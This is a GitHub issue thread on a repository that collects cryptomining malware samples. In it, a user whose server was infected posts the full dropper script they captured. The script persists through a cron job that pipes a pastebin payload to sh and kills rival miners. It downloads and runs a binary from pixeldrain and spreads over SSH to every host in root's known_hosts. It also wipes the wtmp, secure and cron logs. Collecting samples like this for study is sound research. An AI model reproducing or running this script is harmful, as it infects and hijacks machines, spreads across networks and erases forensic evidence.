MRdoulestar / whatMiner

整理和收集遇见的各种恶意挖矿样本以供研究和学习(欢迎小伙伴们一起维护)
MIT License
123 stars 35 forks source link

*/15 * * * * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q -O- https://pastebin.com/raw/TS4NeUnd)|sh #6

Open sanqingshan opened 5 years ago

sanqingshan commented 5 years ago

/15 * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q -O- https://pastebin.com/raw/TS4NeUnd)|sh

sanqingshan commented 5 years ago

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

echo "/10 * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q -O- https://pastebin.com/raw/TS4NeUnd)|sh" | crontab -

mkdir -p /tmp chmod 1777 /tmp

ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9 ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9 ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9 apt-get install curl -y||yum install curl -y||apk add curl -y apt-get install cron -y||yum install crontabs -y||apk add cron -y

if [ ! -f "/tmp/.X11unix" ]; then ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/uXvPTUUH -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/uXvPTUUH -O /tmp/kerberods) && chmod +x /tmp/kerberods elif [ ${ARCH}x = "i686x" ]; then (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/GqV5aqlq -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/GqV5aqlq -O /tmp/kerberods) && chmod +x /tmp/kerberods else (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/GqV5aqlq -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/GqV5aqlq -O /tmp/kerberods) && chmod +x /tmp/kerberods fi /tmp/kerberods elif [ ! -f "/proc/$(cat /tmp/.X11unix)/io" ]; then ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/uXvPTUUH -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/uXvPTUUH -O /tmp/kerberods) && chmod +x /tmp/kerberods elif [ ${ARCH}x = "i686x" ]; then (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/GqV5aqlq -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/GqV5aqlq -O /tmp/kerberods) && chmod +x /tmp/kerberods else (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/GqV5aqlq -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/GqV5aqlq -O /tmp/kerberods) && chmod +x /tmp/kerberods fi /tmp/kerberods fi

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q -O- https://pastebin.com/raw/TS4NeUnd)|sh >/dev/null 2>&1 &' & done fi

echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron # #

sanqingshan commented 5 years ago

下载的是一个二进制文件,现在把域名屏蔽了,定时任务还清理不掉